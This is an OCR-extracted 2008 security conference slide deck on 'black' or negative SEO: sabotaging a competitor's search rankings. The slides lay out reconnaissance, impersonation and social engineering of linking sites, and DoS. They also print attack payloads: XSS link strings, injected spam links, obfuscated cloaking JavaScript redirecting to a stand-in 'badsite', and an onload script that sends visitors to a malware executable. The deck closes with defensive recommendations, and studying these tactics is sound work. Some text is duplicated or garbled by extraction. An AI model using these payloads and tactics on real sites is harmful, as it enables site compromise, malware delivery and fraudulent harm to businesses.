Más contenido relacionado La actualidad más candente (20) Similar a None More Black - the Dark Side of SEO (20) Más de Roberto Suggi Liverani (12) None More Black - the Dark Side of SEO1. None More Black: The Dark Side of SEO
Presented By Roberto Suggi Liverani
© 2008 Security-Assessment.com
2. About me
Roberto Suggi Liverani
Security Consultant - Security-Assessment.com
http://www.security-assessment.com
h //
CISSP
Web App Pen Tester
OWASP New Zealand Founder/Leader -
http://www.owasp.org/index.php/New_Zealand
htt // /i d h /N Z l d
Personal Site: http://malerisch.net
© 2008 Security-Assessment.com
3. Agenda
Introduction
SEO (Search Engine Optimisation) – concepts, definitions
Black SEO – d f
l k definition, security implications
l
Black SEO Exposed:
Methodology – the big plan
Reconnaissance – information gathering is the key
Target Resources Elimination – indirect attack techniques
Frontal attack – direct attack techniques
Collateral damage – other attack techniques
Tools – weapons of SEO destruction
p
Recommendations
Case Study: personalsoftwarefinance.com – the target!
© 2008 Security-Assessment.com
4. Introduction
Top Ten Search Engine Result Page (SERP)
High Competitive Market
3rd - Rank/Position
Search
Engine
Optimisation
Techniques following search engine guidelines: White Hat SEO
Techniques not following any guidelines: Black Hat SEO
© 2008 Security-Assessment.com
5. Introduction
Top Ten Search Engine Result Page (SERP)
High Competitive Market
3rd - Rank/Position
Black/
Negative
Search
S h
Engine
Optimisation
Black SEO (or Negative SEO): sabotage techniques aiming to reduce
a web site's ranking in search engine results
© 2008 Security-Assessment.com
6. Introduction
SEO – Search Engine Optimisation
Search engine optimisation (SEO) is the process of improving the
volume and quality of traffic to a web site from search engines via
"natural" ("organic" or "algorithmic") search results for targeted
keywords.
TOP 10 search engines results page (SERP) = SEO industry
Some SEO terms: positioning, ranking, keywords
SEO Hats:
White Hat SEO: web promotion techniques following search
engine guidelines
Black Hat SEO: web promotion techniques not following any
guidelines
© 2008 Security-Assessment.com
7. Black SEO - Definition
Black SEO Security Concept Map
© 2008 Security-Assessment.com
8. Security Implications 1/2
The common perception towards black SEO:
Google: “There's almost nothing a competitor can do to harm
your ranking or have your site removed from our index”
index
General Assumption: “Black SEO is only related to SEO”
Black SEO and Security:
IT Security still does not include this category of attacks
Most
M t IT Security literature does not even mention the SEO t
S it lit t d t ti th term
The potential:
Black SEO attacks do not always involve exploitation of target
vulnerabilities
50% of the OWASP Top 10 can be used to leverage black SEO
attacks
Knowledge gap between SEO hackers and WEB hackers is
reducing - Latest web spam techniques exploit XSS
© 2008 Security-Assessment.com
9. Security Implications 2/2
Black SEO security considerations:
Three elements in the security model:
Search engine internal processes are not disclosed
Real unknown variable in the black SEO security model
Black SEO attacks:
Search engines process the attack
Attack results are not direct (might be visible after 3 days, 1
( g y ,
week, 1 month or might not be processed)
Attacker needs to monitor continuously attack results
Target needs to realise if under attack
© 2008 Security-Assessment.com
10. Methodology
If you know the enemy and know yourself, you need not fear the result
of a hundred battles. If you know yourself but not the enemy, for
e e y cto y gained
every victory ga ed you will also suffer a defeat. If you know
a so su e de eat o
neither the enemy nor yourself, you will succumb in every battle.
- Sun Tzu
© 2008 Security-Assessment.com
11. Methodology
Black SEO methodology:
Target Reconnaissance
Target Resources Elimination
l
Frontal Attack
Collateral Damage
The weapons:
Search Engines, Hacking Tools, Black Hat SEO techniques, Spam
Tools
What does black SEO attack?
Home/Landing Page - www.targetsite.com
Specific web page - www.targetsite.com/product/xyz.htm
© 2008 Security-Assessment.com
13. Reconaissance
Build target backlinks/neighbors map. Include:
map
Key (authoritative) target resources with high Page Rank
Direct incoming l k to target
links
2nd/3rd Level incoming links to target
Outcoming target links
Approach target as complex structure with relationships:
Business Target Political Target
The parent company Political Party
Subsidiary companies Political Election/Campaign
Sister companies Political Affiliates
Significant business
Supporting Politicians
partners
Brands/Divisions Supporters
© 2008 Security-Assessment.com
14. Reconaissance
Build target backlinks/neighbors map. Include:
map
Key (authoritative) target resources with high Page Rank
Direct incoming l k to target
links
2nd/3rd Level incoming links to target
Outcoming target links
© 2008 Security-Assessment.com
15. Reconaissance
Other elements to consider:
Target Annual reports / Press-Releases
Target contact names and email addresses
d l dd
Target locations and branches
Target mergers/acquisitions, elections
Job/political boards, either internal to the target or external sites
Disgruntled employee or opposite faction blogs
© 2008 Security-Assessment.com
16. Reconnaissance - Tools
Extrapolate target links from search engines:
Google
site:targetsite.com – indexed pages of target site
d d f
link:targetsite.com – pages that link to target site
cache:targetsite.com – current cache of target site
info:targetsite.com – information on target site
related:targetsite.com – pages similar to target site
targetsite.com -> enter full URL into the search fields (+ all
subdomains combinations)
Google News, Google Groups and Google Alerts
Yahoo: Site Explorer - http://siteexplorer.search.yahoo.com/
http://targetsite.com – includes pages indexed and pages that
link t t
li k to target site
t it
© 2008 Security-Assessment.com
17. Reconaissance - Tools
Live Search Macros -
http://search.live.com/macros/default.aspx?FORM=BJJK
Create an advanced search Macro on target site/web page
Other tools:
web.archive.org
web archive org – useful to identify content linked in the past
Maltego: excellent tool to display structure of any entity on the
internet. http://www.paterva.com/web2/Maltego/maltego.html
te et ttp // pate a co / eb / a tego/ a tego t
http://www.scrutinizethis.com/
http://www.abouturl.com/index.php
http://www abouturl com/index php
http://whois.domaintools.com
http://netcraft.net
http://netcraft net
http://www.webmaster-toolkit.com/
http://www.myipneighbors.com/
htt // i i hb /
© 2008 Security-Assessment.com
18. Reconaissance - SEO Tools
Extrapolate target SEO data:
Firefox add-on: Seoquake (https://addons.mozilla.org/en-
US/firefox/addon/3036)
Identify target SEO skills, keywords and SERP positioning:
skills
Check if target uses Google Web Master and/or Yahoo Site
Explorer
po e
Check if target is practicing any SEO techniques
Scan target with SEO software
Webceo - http://www.webceo.com
Check target backlinks
g
http://www.linkhounds.com/link-harvester/backlinks.php
© 2008 Security-Assessment.com
20. Eliminating target resources
The neighbours target map (visual concept):
Thinking like a search engine:
A link to a page = casting a vote
p g g
Votes are related to a specific content/information
Many votes to a site indicate that the site is “authoritative” /
authoritative
“trusted” for a specific content = best value to user
© 2008 Security-Assessment.com
21. Eliminating target resources
Eliminating target resources:
Remove/divert links from authoritative/trusted sites to target site
Remove/divert direct incoming links to target site
/d d l k
Two main attack approaches:
Hack neighbours sites and remove links
Social engineering + direct attack
First approach not always feasible. Second approach:
Impersonate target and social engineer target resources
Motives to remove/divert link: rebranding, restructuring,
maintenance, new domain, spam links, etc.
Enforce case with new domain registered as target, XSS/SQL
injection, spam links, etc.
© 2008 Security-Assessment.com
22. Eliminating target resources
A possible attack scenario:
Impact:
p
Decreased quality/quantity of target neighbours
Target position and rank affected
© 2008 Security-Assessment.com
24. Frontal Attacks Table
Frontal attacks classification
Scope Exploit Probability Attack Impact
Complexity of success Timeframe
Decrease: Low/Medium High/Medium Long Position/Rank
• rank decreased
• position • Reversing search • Web Spam as a • Crawling
• backlinks engines proof • Indexing
• Caching
Demonstrate: High Low/Medium Medium Target
target is: ban/penalisation
• Target vulnerable • Human review of • Tools speed
• deceitful
• Low spam reports indexing
• fraudulent quality/quantity (quantity/quality)
• spamming
p g target backlinks
• Moderate/Absent
target SEO skills
The two scopes and the techniques involved have completely
p q p y
opposite results
Attacker makes a choice depending on: available timeframe,
resources, skills and target exploitability
kill dt t l it bilit
© 2008 Security-Assessment.com
25. Decreasing target positioning
Attack: Spam social bookmarks with target URL
Digg.com, Reddit.com, Onlywire.com, etc
Automatic script + social bookmarks API
lb k k
http://www.onlywire.com/api/add?url=http://targetsite&ti
tle=targetsite&comments=targetsite&tags=targetsite
Impact: Target can be banned. Target site loses links from
trusted/high PR domains
Attack: Duplicate target content in:
target site (exploit stored XSS or SQL injection)
domain with higher PR of target site (buy another site)
many sites (build network of clones)
Impact: Target penalised for duplicate content
© 2008 Security-Assessment.com
26. Decreasing target positioning
Attack: Submit web proxy + target site to search engines
Use proxy with a higher PR and/or higher number of backlinks
than target
Use proxy that do not obfuscate target URL
http://www.zzoop.com/index.php? & http://targetsite/
http://www.zzoop.com/index.php?=&=http://targetsite/
Impact: target position may drop suddenly
Attack: Mass submissions of target to low quality web directories
Most of them are free. Low quality = n/a or PR 0
Publication can take up to 6 months. Do mass submission.
http://www.web-directories.ws
Impact: Decrease quality of neighbours. Position decreased.
© 2008 Security-Assessment.com
27. Decreasing target positioning
Attack: Create backlinks to unused target subdomain
www.targetsite.com – 200 OK (used/promoted)
targetsite.com – 200 OK (
(not used) <- b kl k target
d) backlinks
No 301 redirection and both subdomains must point to same
content
Impact: Positioning affected
Attack: DoS target
Spider needs a 404 Not Found response from target
Then request removal of unavailable target pages
Impact: Target page removed from SERPS
© 2008 Security-Assessment.com
28. Decreasing target positioning
Attack: Promote target site URL + dynamic content such as:
Session IDs
Variables with long values
bl hl l
http://targetsite/?PHPSESSIONID=a8s7d8782378273827381273821s98d&productId=a9
982938219038291832918391389218931&a2=9sa8d9as7d9a7d98sa7d8sa7d8asdsa&b2=1203
18291289381938921&login=true
Impact: positioning decreasing, pages removal or no pages caching
Attack: Promote competition of target using White Hat SEO
competition
target
competition
Impact: positioning decreased
© 2008 Security-Assessment.com
29. Decreasing target positioning
Attack: Build fake content based on target keywords
Turn everything from the target keywords into education
content which provides real value to end user
Promote fake content with black hat/white hat SEO techniques
Fake
Legitimate
Fake
Legitimate
Fake
Legitimate
Legitimate
Impact: positioning shift
© 2008 Security-Assessment.com
30. Target perceived as spammer
Alonzo: [after killing Roger and shooting Jeff] It's not what you know,
it's what you can prove.
Training Day, 2001
© 2008 Security-Assessment.com
31. Target perceived as spammer
Attack: Inject permanent links pointing to bad sites into target
<a href=http://badsite>target site keywords</a>
<a href=http://badsite>spam keywords</a>
Exploit stored XSS, SQL injection in target
l d
Injection must be stealth, deceitful, smart, balanced
Attack should last as long as possible
If possible, make cross links between target and bad sites
Impact: Penalisation and/or ban of target site
Bad site can contain:
Spam
Porn
Malicious Content (malware, virus, trojan/backdoor)
Warez/Cracks/Torrents/File Sharing Links/Illegal Files
Links to other bad sites
© 2008 Security-Assessment.com
32. Target perceived as spammer
Bad site can be:
PayPerClick Page/Blog/Fake Directory/Fake Forum/Scraped Page
Banned
d
Phishing
Thin Affiliate
Free link Exchange
Bad site can use:
JavaScript Redirects - JavaScript used for cloaking
Keyword Stuffing - overloaded page with excessive keywords
Backdoor pages – page that hides backdoor (+ redirection)
p g p g ( )
100% Frame – frameset with one frame 100% to deceive search
engines spiders
© 2008 Security-Assessment.com
33. Target perceived as spammer
Hidden text/Hidden Links – hidden content with intention to
deceive search engines
Foreign Language – foreign language with intention to confuse
search engines
Sneaky Redirects – redirection through rotating domains
Same class C IP addresses and same domain registrant details of
target site
© 2008 Security-Assessment.com
34. Target perceived as spammer
Attack: Promote target XSS link
http://targetsite.com?search=a”><a href=http://badsite>target site keywords</a><!—
http://targetsite.com?search=a”><iframe src=badsite></iframe><!—
http://targesite.com?frameurl=http://badsite
p g p
http://targetsite.com?redirect=http://badsite
Links must point to bad sites
Promote XSS link + target keyword with black-hat SEO
Use link farms, splogs, guest books, forums, any article/page
that
th t enable comments with good PR
bl t ith d
Target site needs to appear in top 10 SERP for the keyword
promoted
If attack is successful, report target to search engines with
search URL, keyword and target URL
, y g
Impact: Penalisation and/or ban of target
© 2008 Security-Assessment.com
35. Target perceived as spammer
Attack: Inject cloaking JavaScript into target site
<script language="JavaScript"> var
r=document.referrer,t="",q;if(r.indexOf("google.")!=-
1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("live.")!=-
1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=-
1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=-
1)t="q";if(document.cookie.length==0 && t.length &&
(document.URL.indexOf("?cloakhook=")!=-1 && ((q=r.indexOf("?"+t+"="))!=-
1||(q r.indexOf( & +t+
1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://badsite/";}</script>
))! 1)){window.location http://badsite/ ;}</script>
Cloaking must point to bad sites
Promote cloaking hook with black-hat SEO
<a href=http://targetsite.com/?cloakhook=10>any keyword</a>
If attack is successful, report target to search engines
Impact: Penalisation and/or ban of target
p / g
© 2008 Security-Assessment.com
36. Target perceived as spammer
Attack: Inject redirection into target
HTML meta tag refresh with a very short time
JavaScript triggering redirection onmouseover event
d
<META http-equiv="refresh" content=“0;URL=http://badsite/buyviagra.php">
<body onmouseover=“document.location(‘//badsite/buyviagra.php’)>
Impact: Penalisation and/or ban of target
Attack: Splog target
Use spam script/tool that leaves target URL in thousands of blog
comments and forums
Create large number of blogs spamming target and using
syndicated services such as RSS to be used in blog pings
http://pingomatic.com/
Impact: b /
I t ban/penalisation
li ti
© 2008 Security-Assessment.com
37. Target perceived as spammer
Attack: Exploit XSS vulnerability in trusted sites to promote target
Create link farm to index XSS link to target site
Xssed.com lists vulnerable sites with high PR
d l l bl hh h
<a href=‘http://www.imdb.com/List?locations="><iframe src=//targetsite.com>
</iframe>’>keyword to be ranked</a>
<a href =‘http://help.yahoo.com/bin/help/redirect.cgi?to_url=
http://targetsite.com’>keyword to be ranked</a>
Attack: Spam target in universities pages, forums, sites with high PR
Some EDU pages are available at low price
Use target name in the account name (reflected in URL)
<a href=‘http://groups.google.com/group/targetsite’>keyword</a>
<a href=‘http://www.bebo.com/targetsite’>keyword</a>
h f ‘htt // b b /t t it ’ k d /
<a href=‘http://www.mixx.com/users/targetsite’>keyword</a>
<a href=‘http://infostore.org/user/targetsite’>keyword</a>
<a href=‘http://cgi.cse.unsw.edu.au/~targetsite/targetsite.html’>keyword</a>
Impact: Target ban
© 2008 Security-Assessment.com
38. Target perceived as spammer
Attack: Store copyrighted material into target site
Material pertinent to target from copyrighted sources (books,
encyclopaedias,
encyclopaedias white papers etc )
papers, etc.)
Issue DMCA complaint if target is US based to search engines
and to target ISP
Impact: target site page temporary removal (legal case)
Attack: Spam ta get s te in spa page
ttac Spa target site spam
Use comments in spam page illegally ranking in top 10 SERPS
Exploit XSS, SQL injection or any injection
XSS
Report both spammer and target to search engines
Impact: t
I t target b
t ban
© 2008 Security-Assessment.com
39. Target perceived as spammer
Attack: Buy paid links on behalf of target
Paid links marketplaces:
www.tnx.net www.isellpagerank.com
www tnx net - www isellpagerank com
Inject links identified as “paid links” into target
Attack: Show target is selling paid-links
paid links
Target site must have a good PR (at least 3 or 4)
Sell li k
S ll links on target behalf through link marketplaces
t t b h lf th h li k k t l
Inject links on sale through stored XSS or SQL injection
Attack: Trade links on behalf of target
Impersonate target to send emails for link trading
Inject links through XSS, SQL injection or any injection
In all cases, report target to search engines
Impact: target site removal/penalisation
© 2008 Security-Assessment.com
41. Collateral Damage
Collateral damage: damage in terms of web marketing context,
context
reputation/image
Attack: 302 hijacking target
Well known Google bug (not completely fixed)
Point many 302 redirections to target site
Implement cloaking on landing page
Target
Target
hijacked
Impact: target site content displacement
© 2008 Security-Assessment.com
42. Collateral Damage
Attack: Create a malware connection with target
Malware hosted on target site or on a third party site
Inject JavaScript which launches malware
h hl h l
<img src=a.gif
onload=javascript:document.location.href='http://malwaresite/malware.exe'; />
Report target site to: Stopbadware.org - McAfee Site Advisor –
AVG Link Scanner
Impact: T
I t Target Sit P bli Image
t Site Public I
Attack: Google bombing/bowling target site with negative keywords
Still works on Google, Yahoo and Live
Pickup a non-common / negative-impact keyword
Promote target site link with negative keyword in good quality
link farm <a href=‘http://targetsite’>bad keyword</a>
Impact: t
I t target reputation and i
t t ti d image
© 2008 Security-Assessment.com
43. Collateral Damage
Attack: Spy on target
Impersonate web anti-spam organisation
Warn target competition about target using black-hat SEO
b bl k h
techniques
Impact: possible legal action against target
Attack: Expose t
Att k E target sensitive pages t SERPS
t iti to
Example: hidden directories, awstats, webalyzer, admin, URL
with username/password, etc
username/password
Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php
Make target link indexed by search engines
Impact: exposure of statistics and sensitive data useful to
competition
© 2008 Security-Assessment.com
44. Collateral Damage
Attack: Expose target sensitive pages to SERPS
Example: hidden directories, awstats, webalyzer, admin, URL
with username/password, etc
username/password
Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php
Make target link indexed by search engines
Impact: exposure of statistics and sensitive data useful to
co pet t o
competition
© 2008 Security-Assessment.com
45. Weapons of SEO Destruction
Xrumer – http://www botmaster net/more1/
http://www.botmaster.net/more1/
Autosubmitter
Large d b
database of forums, groups pages available
ff l bl
Advanced control on threads and posts
Captcha and pictocode support
ProxyURL – http://www.esrun.co.uk/blog/proxy-url-creator/
Generates large list of proxy urls
Sed (Search Engine De-optimisation) ** v0.2 RELEASED**
http://malerisch.net/tools/negativeseo/sed.zip
Page generator with hidden text technique, target keyword
stuffing in meta tags, title tags and other HTML elements
tags
Associate phishing sites URLs from Millersmile archive
Associate random spam keywords to target
A i t d k d t t t
© 2008 Security-Assessment.com
47. sed
Keyword
y
stuffing on
Spam keywords title with
associated to target
target URL
t t keywords
Use of different Meta keywords with spam
Headers keywords
HTML comments with spam
Target keyword keywords
Latest phishing URL
extracted f
t t d from
Millersmile archive and
associated to target
keyword
© 2008 Security-Assessment.com
49. Case Study
Personalsoftwarefinance.com
Personalsoftwarefinance com – fake company selling fake software
Experiment environment factors:
Major Search Engines involved (Google, Yahoo)
h l d( l h )
Primary keywords: personal software finance
Domain name: personalsoftwarefinance.com
ICANN Registrar: Godaddy.com
Reputable Web Hosting: successfullhosting.com
SEO Tools used: Web Seo + common SEO techniques from
articles, books, etc
Web stats tools: awstats, webalizer, hsphere panel tools
Site is vulnerable to common web vulnerabilities such as stored
XSS, SQL injections, XSRF
© 2008 Security-Assessment.com
51. Recommendations
Security Recommendations:
Secure the site - OWASP Testing Guide
Subscribe to Google Webmaster Tool and Yahoo Site Explorer
b b l b l d h l
Check incoming and outcoming links periodically
Set Google Alert
Check/monitor web server logs constantly
Disable 302 temporary redirection if used
Do not use redirection functions
Check periodically web server directory and application source
code for changes/presence of backdoors
© 2008 Security-Assessment.com
52. Conclusions
And remember
remember...
Q: What can I do if I'm afraid my competitor is harming my
ranking in Google?
Google: There's almost nothing a competitor can do to harm your
ranking or have your site removed from our index. If you're
concerned about another site linking to yours, we suggest
contacting the webmaster of the site in question. Google aggregates
a d o ga es o at o published on the eb; e don't control
and organizes information pub s ed o t e web; we do t co t o
the content of these pages.
© 2008 Security-Assessment.com
53. Thanks!
http://www.security assessment.com
http://www.security-assessment.com
Roberto Suggi Liverani
roberto.suggi@security-assessment.com
© 2008 Security-Assessment.com
54. References/Links
Negative SEO articles
Black - Negative SEO Hits Mainstream Media
Companies Offer to Damage Your Competitors Search Engine Rankings
Companies subvert search results to squelch criticism
p q
Condemned To Google Hell - Forbes.com
'Google bowling' and negative SEO All fair in love and war Searchlight - An SEO blog by Stephan Spencer - CNET Blogs
Firms use evil SEO to kill rivals' Google rankings : News : Security - ZDNet Asia
Google allowing other webmasters to damage your site
Google-Proof PR - Forbes.com
In Pictures 7 Ways Your Site Can Be Sabotaged - Forbes.com
Having Fun at Donalds Expense - So How's this Happening? | Threadwatch.org
Google's Matt Cutts' Blog GoogleWashed | Threadwatch.org
Give me money or I will drop your Google Rank - Search Engine Watch Forums
Fighting Off Negative Publicity and Affiliates in the SERPs : SEO Book.com
Google Keeps Tweaking Its Search Engine - New York Times
Google Should Offer Self Defense Against Spammy Inbound Links
Google's Cookie
Michael Sutton's Blog : A Tour of the Google Blacklist
Matt Cutts Google bowling exists Threadwatch.org
g g g
Kick Your Competitor With Negative SEO? - Google Blogoscoped Forum
Negative SEO - Harming Your Competitors With SEO Negative SEO (Black SEO) Tactics - Fighting Dirty
Negative SEO At Work: Buying Cheap Viagra From Google’s Very Own Matt Cutts - Unless You Prefer Reddit? Or Topix? ::
My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up
SEOmoz | Del.icio.us Cloaking to Combat Spam
© 2008 Security-Assessment.com
55. References/Links
Negative SEO articles
SEOmoz | The Dark Side of Wikipedia
The Saboteurs Of Search - Forbes.com
SEOmoz SEO isn�t hacking - and data security tips
g y p
SEO poisoning attacks growing
Google Penalization: Text Links, Redirects Not Likely Causes - Spam Comment Links Maybe - The Story Continues - Robin Good's
Latest News
Other sites can hurt your ranking | JLH Design Blog
Building Authority Websites The Right Way | Denver SEO Guy | Knox in Denver
How Much Money is a Top Google Ranking Worth to Your Business?
Google allowing other webmasters to damage your ranking
Why should I report paid links to Google?
Small treatise about e-manipulation for honest people
Forums/Blogs
Black H t
Bl k Hat SEO Bl k Hat F
Black H t Forum - P
Powered b vBulletin
d by B ll ti
Blackhat SEO
BlackHatCrew - Elite Webmaster SEO Forum
Blackhat SEO » Blog Archive » Free blog hosts Digerati Marketing - The better search blog
Earl Grey`s Black Hat SEO Forum and SEOBlackhat SEM Community - The first and leading Resource on Blackhat SE0
Happar.com Support Forum / Register
Evaluating Google Search Quality | Bruce Cat dot com evilgreenmonkey
Google Search News
Matt Cutts Gadgets, Google, and SEO IncrediBILL's Random Rants
Half’s SEO Notebook
© 2008 Security-Assessment.com
56. References/Links
Forums/Blogs:
IrishWonder’s SEO Consulting Blog
Negative SEO blog SEOassassin
Network Security Research and AI ø Blue Hat SEO-Advanced SEO Tactics ø
y
SEO Black Hat Forum
SEO Black Hat SEO Blog
SEO Chicks |The SEO Blog with attitude
roguespammer: A Rogue Spammer
Search Engine Cloaking and Optimization Forum - SeoJeans / Hot Topics
Stefan Juhl » Internet marketing, SEO & online media monetization Welcome to Seocracy.com
Search Engine Marketing Tips & Search Engine News - Search Engine Watch
SEO Forum
Negative/Positive SEO Techniques:
302 Google Jacking - Has your page been hijacked - Home "Filler Friday: Google Bombing" from Über - Better than you, daily!»
How D Th D li t C t t Filt
H Do The Duplicate Content Filters Work?
W k?
8 ways to abuse your XSS vulnerabilities - stefanjuhl.com
Better search engine ranking Google ranking tips from a Google employee
Better search engine rankings The risk of over-optimization How to remove your competitors from MSN Live!
Hijack A Domain For 200$ at Conceptualist.com, By Sahar Sarid Funny Google's Cache Error
Google and the Mysterious Case of the 1969 Pagejackers || kuro5hin.org
Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs
Link schemes
http://tech.propeller.com/viewstory/2006/07/22/google-has-a-6-month-penalty-for-using-expired-domain/
Improve search engine rankings
© 2008 Security-Assessment.com
57. References/Links
Negative/Positive SEO techniques:
Improve search engine rankings Insider information about Google's ranking algorithm Own-the.net (Webappsec, SEO, and
general Web Dev)
SEOmoz | XSS - How to get 20 .gov links in 20 minutes
Using Canonical Domains to Sabotage Competitors in Google Threadwatch.org
Stop 302 Redirects and Scrapers from Hijacking Web Page PR - Page Rank
SpewMoney™ » Blog Archive » Getting traffic from Facebook or How her milkshake brings all the boys to my website SitePoint
Blogs » example.com vs. www.example.com… trouble!
Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs
The Dark Side of Search Engine Optimization - Organic SEO Wiki
Official Google Webmaster Central Blog: The Impact of User Feedback, Part 1
SEO tools/software:
Blackhat SEO - Esrun » Blackhat SEO Scripts
Black Hat SEO Software Built to Make Money Fast - Black Hat Software
Blackhat SEO - Esrun » GMAIL Account Creator [GAC] Dark SEO Programming
Dark SEO Programming » captcha
Dark Seo Team
dnScoop - Domain Name Value, History, Stats Tool and Forums
Value History
Free URL Redirection, No Ads! Short Free Domain Name (you.co.nr)
Google Remove URL - One for the Good Guys! » SEO Image Blog: Stardate
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1
Free Web Analytic Search Engine Page Rank and SEO Optimization Tools - Are you GoingUp?
Analytic, Engine,
OnlyWire: The Only BookMarklet You'll Ever Need!
OnlyWire: The Only BookMarklet You'll Ever Need!
Pagerank 10 #dS.t ~ darkseoteam.com Pagerank 9 #dS.t ~ darkseoteam.com © 2008 Security-Assessment.com
58. References/Links
SEO Tools/Software:
Pagerank 10 #dS.t ~ darkseoteam.com
Pagerank 9 #dS.t ~ darkseoteam.com
Report a Spam Result Search engine SPAM detector
p p g
SearchStatus | Firefox SEO Toolbar Extension
Proton TM
Recherche Fresh Bdd Google . darkseoteam.com .
Rojo - the best free RSS and Atom feed reader Scraping and Posting your way to money on the Internet - Oooff com
Oooff.com
Squidoo : Explore Lenses
the-cloak home
Web Spam Detection
Whois lookup and Domain name search
Who's linking to you? List your referrers, referers, http_referer, referer, referrer
SerpArchive
Web Directory List Ordered By Weakest Google PageRank
top referrers for webmasters SitePoint Marketplace
Save A Sale : Automated Sales Agent Search Engine Friendly Redirect Checker
© 2008 Security-Assessment.com